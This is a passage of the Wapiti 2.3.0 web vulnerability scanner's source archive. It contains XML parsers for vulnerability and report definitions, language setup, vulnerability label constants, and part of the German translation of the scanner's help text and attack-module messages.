wapiti-2.3.0+dfsg/wapitiCore/file/000077500000000000000000000000001240201516300167475ustar00rootroot00000000000000wapiti-2.3.0+dfsg/wapitiCore/file/__init__.py000066400000000000000000000000001240201516300210460ustar00rootroot00000000000000wapiti-2.3.0+dfsg/wapitiCore/file/anomalyxmlparser.py000066400000000000000000000066471240201516300227340ustar00rootroot00000000000000#!/usr/bin/env python # -*- coding: utf-8 -*- # This file is part of the Wapiti project (http://wapiti.sourceforge.net) # Copyright (C) 2013 Nicolas Surribas # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA from xml.parsers import expat from wapitiCore.language.vulnerability import Anomaly class AnomalyXMLParser(object): ANOMALY = "anomaly" ANOMALY_NAME = "name" ANOMALY_DESCRIPTION = "description" ANOMALY_SOLUTION = "solution" ANOMALY_REFERENCE = "reference" ANOMALY_REFERENCES = "references" ANOMALY_REFERENCE_TITLE = "title" ANOMALY_REFERENCE_URL = "url" anomalies = [] anom = None references = {} title = "" url = "" tag = "" def __init__(self): self._parser = expat.ParserCreate() self._parser.StartElementHandler = self.start_element self._parser.EndElementHandler = self.end_element self._parser.CharacterDataHandler = self.char_data def parse(self, fileName): f = None try: f = open(fileName) content = f.read() self.feed(content) finally: if f is not None: f.close() def feed(self, data): self._parser.Parse(data, 0) def close(self): self._parser.Parse("", 1) del self._parser def start_element(self, name, attrs): if name == self.ANOMALY: self.anom = Anomaly() self.anom.setName(attrs[self.ANOMALY_NAME]) elif name == self.ANOMALY_DESCRIPTION: self.tag = self.ANOMALY_DESCRIPTION elif name == self.ANOMALY_SOLUTION: #self.tag = self.ANOMALY_SOLUTION self.anom.setSolution(attrs["text"]) elif name == self.ANOMALY_REFERENCES: self.references = {} elif name == self.ANOMALY_REFERENCE: self.tag = self.ANOMALY_REFERENCE elif name == self.ANOMALY_REFERENCE_TITLE: self.tag = self.ANOMALY_REFERENCE_TITLE elif name == self.ANOMALY_REFERENCE_URL: self.tag = self.ANOMALY_REFERENCE_URL def end_element(self, name): if name == self.ANOMALY: self.anomalies.append(self.anom) elif name == self.ANOMALY_REFERENCE: self.references[self.title] = self.url elif name == self.ANOMALY_REFERENCES: self.anom.setReferences(self.references) def char_data(self, data): if self.tag == self.ANOMALY_DESCRIPTION: self.anom.setDescription(data) # elif self.tag==self.ANOMALY_SOLUTION: # self.anom.setSolution(data) elif self.tag == self.ANOMALY_REFERENCE_TITLE: self.title = data elif self.tag == self.ANOMALY_REFERENCE_URL: self.url = data self.tag = "" def getAnomalies(self): return self.anomalies wapiti-2.3.0+dfsg/wapitiCore/file/auxtext.py000066400000000000000000000037121240201516300210260ustar00rootroot00000000000000#!/usr/bin/env python # -*- coding: utf-8 -*- # This file is part of the Wapiti project (http://wapiti.sourceforge.net) # Copyright (C) 2008-2013 Nicolas Surribas # # Original authors : # David del Pozo # Alberto Pastor # Copyright (C) 2008 Informatica Gesfor # ICT Romulus (http://www.ict-romulus.eu) # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA class AuxText(object): """Class for reading and writing in text files""" def readLines(self, fileName): """returns a array""" lines = [] f = None try: # Reminder : don't try to read payload files as UTF-8, must give str type f = open(fileName) for line in f: cleanLine = line.strip(" \n") cleanLine = cleanLine.replace("[TAB]", "\t") cleanLine = cleanLine.replace("[LF]", "\n") if cleanLine != "": lines.append(cleanLine.replace("\\0", "\0")) except IOError, e: print(e) #finally clause do not work with jyton #finally: #if f!=None: #f.close() return lines #class if __name__ == "__main__": try: l = AuxText() ll = l.readLines("./config/execPayloads.txt") for li in ll: print(li) except SystemExit: pass wapiti-2.3.0+dfsg/wapitiCore/file/reportgeneratorsxmlparser.py000066400000000000000000000057021240201516300246700ustar00rootroot00000000000000#!/usr/bin/env python # -*- coding: utf-8 -*- # This file is part of the Wapiti project (http://wapiti.sourceforge.net) # Copyright (C) 2008-2013 Nicolas Surribas # # Original author : # David del Pozo # Alberto Pastor # Copyright (C) 2008 Informatica Gesfor # ICT Romulus (http://www.ict-romulus.eu) # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA from xml.parsers import expat from wapitiCore.report.reportgeneratorinfo import ReportGeneratorInfo class ReportGeneratorsXMLParser(object): REPORT_GENERATOR = "reportGenerator" REPORT_GENERATOR_KEY = "reportTypeKey" REPORT_GENERATOR_CLASS_MODULE = "classModule" REPORT_GENERATOR_CLASSNAME = "className" reportGenerators = [] repGen = None tag = "" def __init__(self): self._parser = expat.ParserCreate() self._parser.StartElementHandler = self.start_element self._parser.EndElementHandler = self.end_element self._parser.CharacterDataHandler = self.char_data def parse(self, fileName): f = None try: f = open(fileName) content = f.read() self.feed(content) finally: if f is not None: f.close() def feed(self, data): self._parser.Parse(data, 0) def close(self): self._parser.Parse("", 1) del self._parser def start_element(self, name, attrs): if name == self.REPORT_GENERATOR: self.repGen = ReportGeneratorInfo() elif name == self.REPORT_GENERATOR_KEY: self.tag = self.REPORT_GENERATOR_KEY elif name == self.REPORT_GENERATOR_CLASSNAME: self.tag = self.REPORT_GENERATOR_CLASSNAME elif name == self.REPORT_GENERATOR_CLASS_MODULE: self.tag = self.REPORT_GENERATOR_CLASS_MODULE def end_element(self, name): if name == self.REPORT_GENERATOR: self.reportGenerators.append(self.repGen) def char_data(self, data): if self.tag == self.REPORT_GENERATOR_KEY: self.repGen.setKey(data) elif self.tag == self.REPORT_GENERATOR_CLASSNAME: self.repGen.setClassName(data) elif self.tag == self.REPORT_GENERATOR_CLASS_MODULE: self.repGen.setClassModule(data) self.tag = "" def getReportGenerators(self): return self.reportGenerators wapiti-2.3.0+dfsg/wapitiCore/file/vulnerabilityxmlparser.py000066400000000000000000000074061240201516300241570ustar00rootroot00000000000000#!/usr/bin/env python # -*- coding: utf-8 -*- # This file is part of the Wapiti project (http://wapiti.sourceforge.net) # Copyright (C) 2008-2013 Nicolas Surribas # # Original author : # David del Pozo # Alberto Pastor # Copyright (C) 2008 Informatica Gesfor # ICT Romulus (http://www.ict-romulus.eu) # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA from xml.parsers import expat from wapitiCore.language.vulnerability import Vulnerability class VulnerabilityXMLParser(object): VULNERABILITY = "vulnerability" VULNERABILITY_NAME = "name" VULNERABILITY_DESCRIPTION = "description" VULNERABILITY_SOLUTION = "solution" VULNERABILITY_REFERENCE = "reference" VULNERABILITY_REFERENCES = "references" VULNERABILITY_REFERENCE_TITLE = "title" VULNERABILITY_REFERENCE_URL = "url" vulnerabilities = [] vul = None references = {} title = "" url = "" tag = "" def __init__(self): self._parser = expat.ParserCreate() self._parser.StartElementHandler = self.start_element self._parser.EndElementHandler = self.end_element self._parser.CharacterDataHandler = self.char_data def parse(self, fileName): f = None try: f = open(fileName) content = f.read() self.feed(content) finally: if f is not None: f.close() def feed(self, data): self._parser.Parse(data, 0) def close(self): self._parser.Parse("", 1) del self._parser def start_element(self, name, attrs): if name == self.VULNERABILITY: self.vul = Vulnerability() self.vul.setName(attrs[self.VULNERABILITY_NAME]) elif name == self.VULNERABILITY_DESCRIPTION: self.tag = self.VULNERABILITY_DESCRIPTION elif name == self.VULNERABILITY_SOLUTION: #self.tag = self.VULNERABILITY_SOLUTION self.vul.setSolution(attrs["text"]) elif name == self.VULNERABILITY_REFERENCES: self.references = {} elif name == self.VULNERABILITY_REFERENCE: self.tag = self.VULNERABILITY_REFERENCE elif name == self.VULNERABILITY_REFERENCE_TITLE: self.tag = self.VULNERABILITY_REFERENCE_TITLE elif name == self.VULNERABILITY_REFERENCE_URL: self.tag = self.VULNERABILITY_REFERENCE_URL def end_element(self, name): if name == self.VULNERABILITY: self.vulnerabilities.append(self.vul) elif name == self.VULNERABILITY_REFERENCE: self.references[self.title] = self.url elif name == self.VULNERABILITY_REFERENCES: self.vul.setReferences(self.references) def char_data(self, data): if self.tag == self.VULNERABILITY_DESCRIPTION: self.vul.setDescription(data) # elif self.tag==self.VULNERABILITY_SOLUTION: # self.vul.setSolution(data) elif self.tag == self.VULNERABILITY_REFERENCE_TITLE: self.title = data elif self.tag == self.VULNERABILITY_REFERENCE_URL: self.url = data self.tag = "" def getVulnerabilities(self): return self.vulnerabilities wapiti-2.3.0+dfsg/wapitiCore/language/000077500000000000000000000000001240201516300176135ustar00rootroot00000000000000wapiti-2.3.0+dfsg/wapitiCore/language/__init__.py000066400000000000000000000000001240201516300217120ustar00rootroot00000000000000wapiti-2.3.0+dfsg/wapitiCore/language/language.py000066400000000000000000000055371240201516300217620ustar00rootroot00000000000000#!/usr/bin/env python # -*- coding: utf-8 -*- # This file is part of the Wapiti project (http://wapiti.sourceforge.net) # Copyright (C) 2008-2013 Nicolas Surribas # # Original author : # David del Pozo # Alberto Pastor # Copyright (C) 2008 Informatica Gesfor # ICT Romulus (http://www.ict-romulus.eu) # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA import os import locale import gettext import sys class Language(object): """ This class configures the internationalization of Wapiti, retrieving the texts from the files where is the translation. It establishes the funcion "_" for translating. To do it, the method "configure" should be invoked. """ AVAILABLE_LANGS = ["de", "en", "es", "fr", "ms"] if hasattr(sys, "frozen"): BASE_DIR = os.path.join(os.path.dirname(unicode(sys.executable, sys.getfilesystemencoding())), "data") else: BASE_DIR = os.path.dirname(sys.modules['wapitiCore'].__file__) LANG_PATH = os.path.join(BASE_DIR, "config", "language") def configure(self, lang=None): """ Configures the funcion "_" for translating the texts of Wapiti, this method loads the language indicated as parameter or if the parameter is not specified, it will take the default language of the operating system. """ if lang is None: # if lang is not specified, default language is used defLocale = locale.getdefaultlocale() langCounty = defLocale[0] # en_UK lang = langCounty[:2] # en if lang not in self.AVAILABLE_LANGS: # if lang is not one of the supported languages, we use english print("Oups! No translations found for your language... Using english.") print("Please send your translations for improvements.") print("===============================================================") lang = 'en' lan = gettext.translation('wapiti', self.LANG_PATH, languages=[lang], codeset="UTF-8") lan.install(unicode=1) #funcion which translates def _(key): return lan.lgettext(key) wapiti-2.3.0+dfsg/wapitiCore/language/vulnerability.py000066400000000000000000000101251240201516300230550ustar00rootroot00000000000000#!/usr/bin/env python # -*- coding: utf-8 -*- # This file is part of the Wapiti project (http://wapiti.sourceforge.net) # Copyright (C) 2013 Nicolas Surribas # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA class GenericFlaw(object): #Constants MSG_EVIL_URL = _(" Evil url: {0}") MSG_PARAM_INJECT = _("{0} in {1} via injection in the parameter {2}") MSG_FROM = _(" coming from {0}") MSG_QS_INJECT = _("{0} in {1} via injection in the query string") MSG_PATH_INJECT = _("{0} in {1} via injection in the resource path") MSG_EVIL_PARAM = _("Involved parameter: {0}") MSG_EVIL_REQUEST = _("Evil request:") HIGH_LEVEL = "1" MEDIUM_LEVEL = "2" LOW_LEVEL = "3" name = "" description = "" solution = "" references = {} def getName(self): return self.name def getDescription(self): return self.description def getSolution(self): return self.solution def getReferences(self): return self.references def setName(self, name): self.name = name def setDescription(self, description): self.description = description def setSolution(self, solution): self.solution = solution def setReferences(self, references): self.references = references class Vulnerability(GenericFlaw): #Constants SQL_INJECTION = _("SQL Injection") BLIND_SQL_INJECTION = _("Blind SQL Injection") FILE_HANDLING = _("File Handling") XSS = _("Cross Site Scripting") CRLF = _("CRLF Injection") EXEC = _("Commands execution") HTACCESS = _("Htaccess Bypass") BACKUP = _("Backup file") NIKTO = _("Potentially dangerous file") class Anomaly(GenericFlaw): #Constants ERROR_500 = _("Internal Server Error") RES_CONSUMPTION = _("Resource consumption") MSG_500 = _("Received a HTTP 500 error in {0}") MSG_TIMEOUT = _("Timeout occured in {0}") MSG_QS_TIMEOUT = _("The request timed out while attempting to inject a payload in the query string") MSG_PATH_TIMEOUT = _("The request timed out while attempting to inject a payload in the resource path") MSG_PARAM_TIMEOUT = _("The request timed out while attempting to inject a payload in the parameter {0}") MSG_QS_500 = _("The server responded with a 500 HTTP error code " "while attempting to inject a payload in the query string") MSG_PATH_500 = _("The server responded with a 500 HTTP error code " "while attempting to inject a payload in the resource path") MSG_PARAM_500 = _("The server responded with a 500 HTTP error code " "while attempting to inject a payload in the parameter {0}") # The only reason those lines are here is to allow the translation script to find them _("Backup file description") _("Backup file solution") _("Blind SQL Injection description") _("Blind SQL Injection solution") _("Commands execution description") _("Commands execution solution") _("CRLF description") _("CRLF solution") _("Cross Site Scripting description") _("Cross Site Scripting solution") _("File Handling description") _("File Handling solution") _("Htaccess bypass description") _("Htaccess bypass solution") _("Internal server error description") _("Internal server error solution") _("Potentially dangerous file description") _("Potentially dangerous file solution") _("Resource consumption description") _("Resource consumption solution") _("SQL Injection description") _("SQL Injection solution") wapiti-2.3.0+dfsg/wapitiCore/language_sources/000077500000000000000000000000001240201516300213565ustar00rootroot00000000000000wapiti-2.3.0+dfsg/wapitiCore/language_sources/de.po000066400000000000000000000671571240201516300223260ustar00rootroot00000000000000# Copyright (C) YEAR 2009-2013 Nicolas SURRIBAS # This file is distributed under the same license as the Wapiti package. # #, fuzzy msgid "" msgstr "" "Project-Id-Version: Wapiti SVN\n" "Report-Msgid-Bugs-To: \n" "POT-Creation-Date: 2013-08-25 17:33+0200\n" "PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE\n" "Last-Translator: FULL NAME \n" "Language-Team: LANGUAGE \n" "Language: \n" "MIME-Version: 1.0\n" "Content-Type: text/plain; charset=UTF-8\n" "Content-Transfer-Encoding: 8bit\n" #: ../vulnerability.py:23 msgid " Evil url: {0}" msgstr " Böse URL: {0}" #: ../vulnerability.py:24 msgid "{0} in {1} via injection in the parameter {2}" msgstr "{0} in {1} durch Injektion in den Parameter {2}" #: ../vulnerability.py:25 msgid " coming from {0}" msgstr " von {0} kommend" #: ../vulnerability.py:26 msgid "{0} in {1} via injection in the query string" msgstr "{0} in {1} durch Injektion in den Query-String" #: ../vulnerability.py:27 msgid "{0} in {1} via injection in the resource path" msgstr "{0} in {1} durch Injektion in den Ressourcenpfad" #: ../vulnerability.py:28 msgid "Involved parameter: {0}" msgstr "Betreffender Parameter: {0}" #: ../vulnerability.py:29 msgid "Evil request:" msgstr "Böse Anfrage:" #: ../vulnerability.py:67 msgid "SQL Injection" msgstr "SQL Injektion" #: ../vulnerability.py:68 msgid "Blind SQL Injection" msgstr "Blinde SQL Injektion" #: ../vulnerability.py:69 msgid "File Handling" msgstr "Dateihandhabung" #: ../vulnerability.py:70 msgid "Cross Site Scripting" msgstr "Cross-Site Scripting" #: ../vulnerability.py:72 msgid "Commands execution" msgstr "Befehlsausführung" #: ../vulnerability.py:73 msgid "Htaccess Bypass" msgstr "Htaccess Überwindung" #: ../vulnerability.py:74 msgid "Backup file" msgstr "Sicherungsdatei" #: ../vulnerability.py:75 msgid "Potentially dangerous file" msgstr "Möglicherweise gefährliche Datei" #: ../vulnerability.py:80 msgid "Internal Server Error" msgstr "Interner Server Fehler" #: ../vulnerability.py:81 msgid "Resource consumption" msgstr "Ressourcenverbrauch" #: ../vulnerability.py:83 msgid "Received a HTTP 500 error in {0}" msgstr "HTTP Fehler 500 erhalten in {0}" #: ../vulnerability.py:84 msgid "Timeout occured in {0}" msgstr "Zeitlimit überschritten in {0}" #: ../vulnerability.py:86 msgid "The request timed out while attempting to inject a payload in the query string" msgstr "Zeitüberschreitung der Anfrage beim Versuch ein Payload in den Query-String zu injizieren" #: ../vulnerability.py:87 msgid "The request timed out while attempting to inject a payload in the resource path" msgstr "Zeitüberschreitung der Anfrage beim Versuch ein Payload in den Ressourcenpfad zu injizieren" #: ../vulnerability.py:88 msgid "The request timed out while attempting to inject a payload in the parameter {0}" msgstr "Zeitüberschreitung der Anfrage beim Versuch ein Payload in den Parameter {0} zu injizieren" #: ../vulnerability.py:90 msgid "The server responded with a 500 HTTP error code while attempting to inject a payload in the query string" msgstr "Der Server antwortete mit einem HTTP-Fehlercode 500 beim Versuch ein Payload in den Query-String zu injizieren" #: ../vulnerability.py:92 msgid "The server responded with a 500 HTTP error code while attempting to inject a payload in the resource path" msgstr "Der Server antwortete mit einem HTTP-Fehlercode 500 beim Versuch ein Payload in den Ressourcenpfad zu injizieren" #: ../vulnerability.py:94 msgid "The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter {0}" msgstr "Der Server antwortete mit einem HTTP-Fehlercode 500 beim Versuch ein Payload in den Parameter {0} zu injizieren" #: ../wapiti.py:69 msgid "Invalid argument for option {0} : {1}" msgstr "Ungültiger Parameter für die Option {0} : {1}" #: ../wapiti.py:226 msgid "[*] Loading modules:" msgstr "[*] Lade Module:" #: ../wapiti.py:297 msgid "No links or forms found in this page !" msgstr "Keine Links oder Formulare auf der Seite gefunden !" #: ../wapiti.py:298 msgid "Make sure the url is correct." msgstr "Prüfen Sie, ob die URL korrekt ist." #: ../wapiti.py:310 msgid "[!] Missing dependecies for module {0}:" msgstr "[!] Fehlende Abhängigkeiten für Modul {0}:" #: ../wapiti.py:316 msgid "[+] Launching module {0}" msgstr "[+] Starte Modul {0}" #: ../wapiti.py:321 msgid "Upload scripts found:" msgstr "Upload-Skripte gefunden:" #: ../wapiti.py:335 msgid "Report" msgstr "Bericht" #: ../wapiti.py:337 msgid "A report has been generated in the file {0}" msgstr "Ein Bericht wurde in der Datei {0} erzeugt" #: ../wapiti.py:339 msgid "Open {0}/index.html with a browser to see this report." msgstr "Öffnen Sie {0}/index.html in einem Browser um diesen Bericht zu sehen." #: ../wapiti.py:410 msgid "wapitiDoc" msgstr "" "Wapiti-2.3.0 - Sicherheitsscanner für Webanwendungen \n" " \n" " Befehlszeile: python wapiti.py http://server.com/base/url/ [Optionen] \n" " \n" " Unterstützte Optionen sind: \n" " -s \n" " --start \n" " \tUm eine URL anzugeben, von der begonnen werden soll. Diese Option kann mehrfach verwendet werden.\n" " \tWapiti wird diese Links nach weiteren URLs durchsuchen, auch wenn der angegebene Link nicht dem Suchmuster entspricht.\n" " \n" " -x \n" " --exclude \n" " \tUm eine URL vom Scan auszulassen (z.B. Logout-URLs). Diese Option kann für verschiedene URLs mehrfach verwendet werden.\n" " \tPlatzhalter (*) können in der URL für einfache reguläre Ausdrücke verwendet werden.\n" " \tBeispiel : -x http://server/base/?page=*&module=test\n" " \tor -x http://server/base/admin/* um ein Verzeichnis auszulassen.\n" " \n" " -p \n" " --proxy \n" " \tUm einen Proxy anzugeben. Zur Zeit werden HTTP- und HTTPS-Proxys unterstützt.\n" " \tDiese Option kann mehrfach verwendet werden, um HTTP- und HTTPS-Proxys anzugeben.\n" " \tBeispiel: -p http://proxy:port/\n" " \n" " -c \n" " --cookie \n" " \tUm Cookies für den Scan zu importieren. Die Cookie-Datei muss im JSON-Format sein.\n" " \tCookies können mit Hilfe der Werkzeuge cookie.py und getcookie.py (net-Verzeichnis) aufgezeichnet werden.\n" " \n" " -t \n" " --timeout \n" " \tUm ein Zeitlimit zu setzen (Maximalzeit in Sekunden, die auf eine Serverantwort gewartet werden soll).\n" " \n" " -a \n" " --auth \n" " \tZugangsdaten für HTTP-Authentifizierung setzen.\n" " \n" " --auth-method \n" " \tWenn der Server eine Authentifizierung erfordert, kann so die Authentifizierungsmethode gesetzt werden.\n" " \tZur Zeit unterstützte Methoden sind (einige erfordern die Installation von Zusatzmodulen):\n" " \t\t+ basic\n" " \t\t+ digest\n" " \t\t+ kerberos\n" " \t\t+ ntlm\n" " \n" " -r \n" " --remove \n" " \tEinen Parameter (Name und Wert) von URLs entfernen.\n" " \n" " -n \n" " --nice \n" " \tEine Maximale Anzahl von URLs mit dem gleichen Suchmuster festlegen (z.B. die maximale Anzahl einzigartiger Werte für einen Parameter).\n" " \tBenutzen Sie diese Option, um Endlosschleifen während des Scans zu verhindern. Das Limit muss größer als 0 sein.\n" " \n" " -m \n" " --module \n" " \tModule (und HTTP-Methoden für jedes Modul) für die Angriffe festlegen.\n" " \tEinem Modul kann ein Bindestrich vorangestellt werden, um es zu deaktivieren.\n" " \tUm das Ziel nur zu durchsuchen (ohne Payloads zu senden), deaktivieren Sie jedes Modul mit -m \"-all\".\n" " \tOhne Festlegung von HTTP-Methoden werden GET und POST verwendet.\n" " \tBeispiel: -m \"-all,xss:get,exec:post\"\n" " \n" " -u \n" " --color \n" " \tFarben benutzen, um Verwundbarkeiten und Anomalien in der Ausgabe zu markieren. \n" " \n" " -v \n" " --verbose \n" " \tProtokollierungstiefe festlegen. \n" " \t0: Leise (Standard), 1: Jede URL ausgeben, 2: Jeden Angriff ausgeben. \n" " \n" " -b \n" " --scope \n" " \tSuchmuster festlegen:\n" " \t\t+ page: um eine Seite zur analysieren, die als root-URL festgelegt wurde.\n" " \t\t+ folder: um alle URLs unterhalb der root-URL, die an Wapiti übergeben wurde, zu analysieren. (Standard).\n" " \t\t+ domain: um alle Links zu den Seiten zu analysieren, die innerhalb der gleichen Domain sind wie die URL, die an Wapiti übergeben wurde.\n" " \n" " -f \n" " --format \n" " \tFormat für den Bericht festlegen. \n" " \tjson: Report im JSON-Format \n" " \thtml: Report im HTML-Format (Standard)\n" " \topenvas: Report im OpenVAS XML-Format \n" " \ttxt: Report im Klartext (UTF-8) \n" " \tvulneranet: Report im VulneraNET-Format (XML basiert) \n" " \txml: Report im XML-Format \n" " \n" " -o \n" " --output \n" " \tDen Dateinamen des Berichts festlegen. \n" " \tWenn der Bericht im Format 'html' ist, wird dieser Parameter als Verzeichnisname benutzt.\n" " \n" " -i \n" " --continue \n" " \tDieser Parameter weist Wapiti an, den letzten Scan der in der XML-Statusdatei\n" " gespeichert wurde, fortzusetzen.\n" " \tDer Dateiname ist optional, falls nicht festgelegt, wird Wapiti die Standard- " "Datei aus dem \"scans\"-Verzeichnis nutzen.\n" " \n" " -k \n" " --attack \n" " \tDieser Parameter weist Wapiti an, die Angriffe fortzusetzen ohne die Website erneut " "zu scannen, indem es den Status aus der festgelegten Datei lädt.\n" " \tDer Dateiname ist optional, falls nicht festgelegt, wird Wapiti die Standard- " "Datei aus dem \"scans\"-Verzeichnis nutzen.\n" " \n" " --verify-ssl <0|1>\n" " \tDieser Parameter zeigt an, ob Wapiti SSL-Zertifikate überprüfen soll.\n" " \tStandardmäßig werden diese überprüft\n" " \n" " -h \n" " --help \n" " \tUm diese Dokumentation anzuzeigen\n" " " #: ../wapiti.py:418 msgid "Wapiti-2.3.0 (wapiti.sourceforge.net)" msgstr "Wapiti-2.3.0 (wapiti.sourceforge.net)" #: ../wapiti.py:549 msgid "File {0} loaded. Wapiti will use it to perform the attack" msgstr "Datei {0} geladen. Wapiti wird sie nutzen, um den nächsten Angriff durchzuführen" #: ../attack/attack.py:166 msgid "+ attackGET {0}" msgstr "+ attackGET {0}" #: ../attack/attack.py:171 ../attack/attack.py:185 #: ../attack/mod_permanentxss.py:87 ../attack/mod_permanentxss.py:89 #: ../attack/mod_permanentxss.py:147 ../attack/mod_permanentxss.py:272 msgid "error: {0} while attacking {1}" msgstr "Fehler: {0} während des Angriffs auf {1}" #: ../attack/attack.py:173 ../attack/attack.py:187 msgid "error: timeout while attacking {0}" msgstr "Fehler: Zeitüberschreitung während des Angriffs auf {0}" #: ../attack/attack.py:180 msgid "+ attackPOST {0} from {1}" msgstr "+ attackPOST {0} von {1}" #: ../attack/mod_backup.py:89 msgid "Found backup file !" msgstr "Sicherungsdatei gefunden !" #: ../attack/mod_backup.py:94 msgid "Backup file {0} found for {1}" msgstr "Sicherungsdatei {0} gefunden für {1}" #: ../attack/mod_blindsql.py:40 msgid "Blind SQL vulnerability" msgstr "Blinde SQL-Injektion" #: ../attack/mod_blindsql.py:93 ../attack/mod_file.py:146 #: ../attack/mod_sql.py:131 msgid "{0} via injection in the query string" msgstr "{0} durch Injektion in den Query-String" #: ../attack/mod_blindsql.py:141 ../attack/mod_blindsql.py:222 #: ../attack/mod_exec.py:195 ../attack/mod_exec.py:292 #: ../attack/mod_file.py:211 ../attack/mod_file.py:301 #: ../attack/mod_sql.py:258 msgid "{0} via injection in the parameter {1}" msgstr "{0} durch Injektion in den Parameter {1}" #: ../attack/mod_crlf.py:31 msgid "CRLF Injection" msgstr "CRLF-Injektion" #: ../attack/mod_crlf.py:70 ../attack/mod_crlf.py:77 msgid "(QUERY_STRING)" msgstr "(QUERY_STRING)" #: ../attack/mod_crlf.py:121 msgid "Error: The server did not understand this request" msgstr "Fehler: Der Server hat die Anfrage nicht verstanden" #: ../attack/mod_exec.py:45 msgid "Command execution" msgstr "Befehlsausführung" #: ../attack/mod_exec.py:48 msgid "PHP evaluation" msgstr "PHP-Interpretation" #: ../attack/mod_exec.py:51 ../attack/mod_exec.py:54 msgid "Warning exec" msgstr "Warnung exec" #: ../attack/mod_exec.py:57 ../attack/mod_exec.py:63 msgid "preg_replace injection" msgstr "preg_replace-Injektion" #: ../attack/mod_exec.py:60 msgid "Warning usort()" msgstr "usort()-Warnung" #: ../attack/mod_exec.py:66 msgid "Warning assert" msgstr "Assert-Warnung" #: ../attack/mod_exec.py:69 msgid "Evalutation warning" msgstr "Evaluations-Warnung" #: ../attack/mod_file.py:40 msgid "Remote inclusion vulnerability" msgstr "Entfernte Datei-Inklusions-Schwachstelle" #: ../attack/mod_file.py:41 msgid "Linux local file disclosure vulnerability" msgstr "Linux lokale Datei-Disclosure Schwachstelle" #: ../attack/mod_file.py:42 msgid "BSD local file disclosure vulnerability" msgstr "BSD lokale Datei-Disclosure Schwachstelle" #: ../attack/mod_file.py:43 msgid "Windows local file disclosure vulnerability" msgstr "Windows lokale Datei-Disclosure Schwachstelle" #: ../attack/mod_file.py:44 ../attack/mod_file.py:45 msgid "File disclosure vulnerability in include_path" msgstr "Datei-Disclosure Schwachstelle im include_path" #: ../attack/mod_file.py:46 msgid "highlight_file() vulnerability in basedir" msgstr "highlight_file() Schwachstelle im basedir" #: ../attack/mod_file.py:47 msgid "include() of file in include_path" msgstr "include() von Datei im include_path" #: ../attack/mod_file.py:84 msgid "Possible {0} vulnerability" msgstr "Mögliche {0} Schwachstelle" #: ../attack/mod_htaccess.py:75 msgid "HtAccess protection found: {0}" msgstr "HtAccess Schutz gefunden: {0}" #: ../attack/mod_htaccess.py:85 msgid "|HTTP Code: {0} : {1}" msgstr "|HTTP Code: {0} : {1}" #: ../attack/mod_htaccess.py:88 ../attack/mod_htaccess.py:102 msgid "Source code:" msgstr "Quellcode:" #: ../attack/mod_htaccess.py:94 msgid "{0} HtAccess" msgstr "{0} HtAccess" #: ../attack/mod_htaccess.py:95 msgid " .htaccess bypass vulnerability: {0}" msgstr " .htaccess bypass-Schwachstelle: {0}" #: ../attack/mod_htaccess.py:99 msgid "|HTTP Code: {0}" msgstr "|HTTP Code: {0}" #: ../attack/mod_nikto.py:75 msgid "Problem with local nikto database." msgstr "Problem mit der lokalen nikto-Datenbank." #: ../attack/mod_nikto.py:76 msgid "Downloading from the web..." msgstr "Lade aus dem Web herunter..." #: ../attack/mod_nikto.py:90 msgid "Error downloading Nikto database" msgstr "Fehler beim Herunterladen der Nikto-Datenbank" #: ../attack/mod_nikto.py:235 ../attack/mod_nikto.py:237 msgid "References:" msgstr "Referenzen:" #: ../attack/mod_permanentxss.py:57 msgid "Stored XSS vulnerability" msgstr "Persistente XSS-Schwachstelle" #: ../attack/mod_permanentxss.py:115 ../attack/mod_permanentxss.py:161 msgid "Found permanent XSS in {0} with {1}" msgstr "Persistentes XSS gefunden in {0} mit {1}" #: ../attack/mod_permanentxss.py:213 